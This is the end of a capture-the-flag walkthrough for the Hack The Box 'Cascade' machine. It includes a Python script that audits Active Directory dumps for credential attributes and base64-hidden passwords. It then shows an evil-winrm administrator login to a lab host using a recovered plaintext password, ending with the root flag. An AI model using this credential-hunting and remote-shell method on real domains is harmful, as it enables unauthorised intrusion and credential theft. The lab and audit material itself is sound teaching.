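Deleted                         : True
"""

# attribute name, optional padding, ':' plus an optional second ':' (the LDIF
# marker for a base64-encoded binary value), then the value
ATTR_RE = re.compile(r"^([A-Za-z][\w-]*)\s*:(:?)\s*(.*)$")


def parse_attributes(dump):
    """Yield (name, value, ldif_base64) for each attribute line of a dump.

    Accepts ldapsearch LDIF ('attr: v' / 'attr:: base64') and the padded
    'attr       : v' layout PowerShell prints. Comments and indented
    continuation lines are skipped."""
    for line in dump.splitlines():
        if not line or line[0] in " \t#":
            continue
        m = ATTR_RE.match(line)
        if m:
            yield m.group(1), m.group(3).strip(), m.group(2) == ":"


def decodes_to_text(value):
    """Return the decoded string if value is base64 of printable ASCII, else None."""
    if len(value) < 4:
        return None
    try:
        text = base64.b64decode(value, validate=True).decode("ascii")
    except ValueError:  # bad alphabet/padding (binascii.Error) or non-ASCII bytes
        return None
    return text if text and text.isprintable() else None


def audit(dump):
    """Return [(attribute, raw_value, decoded_or_None)] for attributes that
    either have a credential-like name or hold a base64 string that decodes
    to readable text. Values LDIF already marks as base64 ('::') are genuine
    binary attributes such as objectGUID and are not decoded."""
    findings = []
    for name, value, ldif_b64 in parse_attributes(dump):
        decoded = None if ldif_b64 else decodes_to_text(value)
        if decoded is not None or any(p in name.lower() for p in SENSITIVE_NAME_PARTS):
            findings.append((name, value, decoded))
    return findings


if __name__ == "__main__":
    for label, dump in (("ldapsearch", LDIF_SAMPLE), ("Get-ADObject", PS_SAMPLE)):
        for name, value, decoded in audit(dump):
            print(f"[{label}] {name} = {value!r} -> {decoded!r}")
```

Run against a full export (including deleted objects, which keep their attributes until garbage collection), any finding is an attribute to clear and a password to treat as exposed.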

GETTING ADMINISTRATOR ACCESS


    ┌─[root@liquid]─[~/Desktop/HTB/cascade/Logs/Ark AD Recycle Bin]
    └──╼ #evil-winrm -u administrator -p baCT3r1aN00dles -i 10.10.10.182

    Evil-WinRM shell v2.3

    Info: Establishing connection to remote endpoint

    *Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
    cascade\administrator
    *Evil-WinRM* PS C:\Users\Administrator\Documents> hostname
    CASC-DC1
    *Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
    *Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
    08e7a535*****************82e075

HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE
